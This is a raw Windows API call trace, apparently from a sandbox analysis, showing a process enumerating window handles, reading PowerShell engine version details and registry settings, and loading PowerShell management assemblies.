	[0471.309] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xddc
	[0471.309] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xdd8
	[0471.309] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xd34
	[0471.309] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xd10
	[0471.309] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xd0c
	[0471.309] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xc9c
	[0471.309] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xc74
	[0471.310] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xc1c
	[0471.310] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xc08
	[0471.310] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xabc
	[0471.310] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x24c
	[0471.310] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xbb0
	[0471.310] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xbfc
	[0471.310] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xb10
	[0471.310] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x374
	[0471.310] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x368
	[0471.310] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xb28
	[0471.311] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xae8
	[0472.714] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xb14
	[0472.714] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x95c
	[0472.715] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xa8c
	[0472.715] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x46c
	[0472.715] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xb3c
	[0472.715] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xa90
	[0472.715] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xad0
	[0472.715] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xa9c
	[0472.715] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xaa0
	[0472.715] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xb1c
	[0472.715] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x7e0
	[0472.716] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xa74
	[0472.716] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x694
	[0472.716] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xa28
	[0472.716] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x9b0
	[0472.716] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x8d8
	[0472.716] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x940
	[0472.716] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x93c
	[0472.716] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4ec
	[0472.716] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x150
	[0472.716] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x720
	[0472.717] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x3c4
	[0472.717] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x7d4
	[0472.717] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x6c8
	[0472.717] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xb54
	[0472.717] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xb54
	[0472.717] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xb5c
	[0472.717] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x838
	[0472.717] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x818
	[0472.717] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x5b8
	[0472.718] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x494
	[0472.718] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1ec
	[0472.718] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x440
	[0472.718] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x7e8
	[0472.718] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x730
	[0472.718] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x2c8
	[0472.718] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x31c
	[0472.718] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x330
	[0472.718] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x128
	[0472.718] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x5c8
	[0472.719] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x6f8
	[0472.719] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x358
	[0472.719] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x73c
	[0472.719] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xb0
	[0472.719] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x250
	[0472.719] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x240
	[0472.719] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x790
	[0472.719] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x61c
	[0472.719] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x568
	[0472.719] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x538
	[0472.720] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x540
	[0472.720] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x460
	[0472.720] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x79c
	[0472.720] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4e0
	[0472.720] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x460
	[0472.720] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x778
	[0472.724] WerSetFlags () returned 0x0
	[0472.731] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0472.732] CoTaskMemFree (pv=0x0) 
	[0472.732] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1eda88, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1eda80 | out: pulNumLanguages=0x1eda88, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1eda80) returned 1
	[0472.732] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1eda88, pwszLanguagesBuffer=0x2c81ef0, pcchLanguagesBuffer=0x1eda80 | out: pulNumLanguages=0x1eda88, pwszLanguagesBuffer=0x2c81ef0, pcchLanguagesBuffer=0x1eda80) returned 1
	[0472.738] CoTaskMemAlloc (cb=0x24) returned 0x3d6d00
	[0472.738] GetUserDefaultLocaleName (in: lpLocaleName=0x3d6d00, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0472.738] CoTaskMemFree (pv=0x3d6d00) 
	[0472.761] CoTaskMemAlloc (cb=0x104) returned 0x333120
	[0472.761] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x333120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0472.761] CoTaskMemFree (pv=0x333120) 
	[0473.964] CoTaskMemAlloc (cb=0x104) returned 0x333120
	[0473.964] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x333120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0473.964] CoTaskMemFree (pv=0x333120) 
	[0473.966] CoTaskMemAlloc (cb=0x104) returned 0x333120
	[0473.967] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x333120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0473.967] CoTaskMemFree (pv=0x333120) 
	[0473.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0473.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0473.977] SetErrorMode (uMode=0x1) returned 0x1
	[0473.977] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1ed700 | out: lpFileInformation=0x1ed700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0473.978] SetErrorMode (uMode=0x1) returned 0x1
	[0473.978] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1ed970 | out: lpdwHandle=0x1ed970) returned 0x94c
	[0473.979] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c85780 | out: lpData=0x2c85780) returned 1
	[0473.980] VerQueryValueW (in: pBlock=0x2c85780, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ed8e8, puLen=0x1ed8e0 | out: lplpBuffer=0x1ed8e8*=0x2c8581c, puLen=0x1ed8e0) returned 1
	[0473.980] VerQueryValueW (in: pBlock=0x2c85780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1ed858, puLen=0x1ed850 | out: lplpBuffer=0x1ed858*=0x2c858f8, puLen=0x1ed850) returned 1
	[0473.980] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0473.980] CoTaskMemAlloc (cb=0x2e) returned 0x3e2c50
	[0473.980] lstrcpyW (in: lpString1=0x3e2c50, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0473.980] CoTaskMemFree (pv=0x3e2c50) 
	[0473.980] VerQueryValueW (in: pBlock=0x2c85780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1ed858, puLen=0x1ed850 | out: lplpBuffer=0x1ed858*=0x2c8594c, puLen=0x1ed850) returned 1
	[0473.980] lstrlenW (lpString="System.Management.Automation") returned 28
	[0473.980] CoTaskMemAlloc (cb=0x3c) returned 0x3e1b20
	[0473.980] lstrcpyW (in: lpString1=0x3e1b20, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0473.980] CoTaskMemFree (pv=0x3e1b20) 
	[0473.980] VerQueryValueW (in: pBlock=0x2c85780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1ed858, puLen=0x1ed850 | out: lplpBuffer=0x1ed858*=0x2c859a8, puLen=0x1ed850) returned 1
	[0473.980] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0473.980] CoTaskMemAlloc (cb=0x20) returned 0x3dcaa0
	[0473.980] lstrcpyW (in: lpString1=0x3dcaa0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0473.980] CoTaskMemFree (pv=0x3dcaa0) 
	[0473.980] VerQueryValueW (in: pBlock=0x2c85780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1ed858, puLen=0x1ed850 | out: lplpBuffer=0x1ed858*=0x2c859e8, puLen=0x1ed850) returned 1
	[0473.980] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0473.981] CoTaskMemAlloc (cb=0x44) returned 0x3e1b20
	[0473.981] lstrcpyW (in: lpString1=0x3e1b20, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0473.981] CoTaskMemFree (pv=0x3e1b20) 
	[0473.981] VerQueryValueW (in: pBlock=0x2c85780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1ed858, puLen=0x1ed850 | out: lplpBuffer=0x1ed858*=0x2c85a50, puLen=0x1ed850) returned 1
	[0473.981] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0473.981] CoTaskMemAlloc (cb=0x76) returned 0x381160
	[0473.981] lstrcpyW (in: lpString1=0x381160, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0473.981] CoTaskMemFree (pv=0x381160) 
	[0473.981] VerQueryValueW (in: pBlock=0x2c85780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1ed858, puLen=0x1ed850 | out: lplpBuffer=0x1ed858*=0x2c85aec, puLen=0x1ed850) returned 1
	[0473.981] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0473.981] CoTaskMemAlloc (cb=0x44) returned 0x3e1b20
	[0473.981] lstrcpyW (in: lpString1=0x3e1b20, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0473.981] CoTaskMemFree (pv=0x3e1b20) 
	[0473.981] VerQueryValueW (in: pBlock=0x2c85780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1ed858, puLen=0x1ed850 | out: lplpBuffer=0x1ed858*=0x2c85b50, puLen=0x1ed850) returned 1
	[0473.981] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0473.981] CoTaskMemAlloc (cb=0x58) returned 0x338670
	[0473.981] lstrcpyW (in: lpString1=0x338670, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0473.981] CoTaskMemFree (pv=0x338670) 
	[0473.981] VerQueryValueW (in: pBlock=0x2c85780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1ed858, puLen=0x1ed850 | out: lplpBuffer=0x1ed858*=0x2c85bcc, puLen=0x1ed850) returned 1
	[0473.981] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0473.981] CoTaskMemAlloc (cb=0x20) returned 0x3dcaa0
	[0473.981] lstrcpyW (in: lpString1=0x3dcaa0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0473.981] CoTaskMemFree (pv=0x3dcaa0) 
	[0473.981] VerQueryValueW (in: pBlock=0x2c85780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1ed858, puLen=0x1ed850 | out: lplpBuffer=0x1ed858*=0x2c85874, puLen=0x1ed850) returned 1
	[0473.981] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0473.981] CoTaskMemAlloc (cb=0x66) returned 0x3dbcd0
	[0473.981] lstrcpyW (in: lpString1=0x3dbcd0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0473.982] CoTaskMemFree (pv=0x3dbcd0) 
	[0473.982] VerQueryValueW (in: pBlock=0x2c85780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1ed858, puLen=0x1ed850 | out: lplpBuffer=0x1ed858*=0x0, puLen=0x1ed850) returned 0
	[0473.982] VerQueryValueW (in: pBlock=0x2c85780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1ed858, puLen=0x1ed850 | out: lplpBuffer=0x1ed858*=0x0, puLen=0x1ed850) returned 0
	[0473.982] VerQueryValueW (in: pBlock=0x2c85780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1ed858, puLen=0x1ed850 | out: lplpBuffer=0x1ed858*=0x0, puLen=0x1ed850) returned 0
	[0473.982] VerQueryValueW (in: pBlock=0x2c85780, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ed828, puLen=0x1ed820 | out: lplpBuffer=0x1ed828*=0x2c8581c, puLen=0x1ed820) returned 1
	[0473.982] CoTaskMemAlloc (cb=0x204) returned 0x3838e0
	[0473.982] VerLanguageNameW (in: wLang=0x0, szLang=0x3838e0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0473.982] CoTaskMemFree (pv=0x3838e0) 
	[0473.982] VerQueryValueW (in: pBlock=0x2c85780, lpSubBlock="\\", lplpBuffer=0x1ed878, puLen=0x1ed870 | out: lplpBuffer=0x1ed878*=0x2c857a8, puLen=0x1ed870) returned 1
	[0473.991] CoTaskMemAlloc (cb=0x104) returned 0x333120
	[0473.991] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x333120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0473.991] CoTaskMemFree (pv=0x333120) 
	[0474.902] CoTaskMemAlloc (cb=0x104) returned 0x333120
	[0474.902] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x333120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0474.902] CoTaskMemFree (pv=0x333120) 
	[0474.906] lstrlenW (lpString="䅁") returned 1
	[0474.916] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed748 | out: phkResult=0x1ed748*=0x2fc) returned 0x0
	[0474.917] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed738 | out: phkResult=0x1ed738*=0x300) returned 0x0
	[0474.918] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed7c8 | out: phkResult=0x1ed7c8*=0x304) returned 0x0
	[0474.922] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed70c, lpData=0x0, lpcbData=0x1ed708*=0x0 | out: lpType=0x1ed70c*=0x1, lpData=0x0, lpcbData=0x1ed708*=0x56) returned 0x0
	[0474.923] CoTaskMemAlloc (cb=0x5a) returned 0x3dbc60
	[0474.923] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed6dc, lpData=0x3dbc60, lpcbData=0x1ed6d8*=0x56 | out: lpType=0x1ed6dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed6d8*=0x56) returned 0x0
	[0474.923] CoTaskMemFree (pv=0x3dbc60) 
	[0474.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0474.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0474.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0476.082] CoTaskMemAlloc (cb=0x104) returned 0x333120
	[0476.082] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x333120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0476.082] CoTaskMemFree (pv=0x333120) 
	[0479.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0479.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0481.473] CoTaskMemAlloc (cb=0x104) returned 0x3d5910
	[0481.473] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d5910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0481.473] CoTaskMemFree (pv=0x3d5910) 
	[0481.474] CoTaskMemAlloc (cb=0x104) returned 0x3d5910
	[0481.474] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d5910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0481.474] CoTaskMemFree (pv=0x3d5910) 
	[0482.355] CoTaskMemAlloc (cb=0x104) returned 0x3d5910
	[0482.355] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d5910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0482.355] CoTaskMemFree (pv=0x3d5910) 
	[0482.357] CoTaskMemAlloc (cb=0x104) returned 0x3d5910
	[0482.357] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d5910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0482.357] CoTaskMemFree (pv=0x3d5910) 
	[0482.358] CoTaskMemAlloc (cb=0x104) returned 0x3d5910
	[0482.358] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d5910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0482.358] CoTaskMemFree (pv=0x3d5910) 
	[0484.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
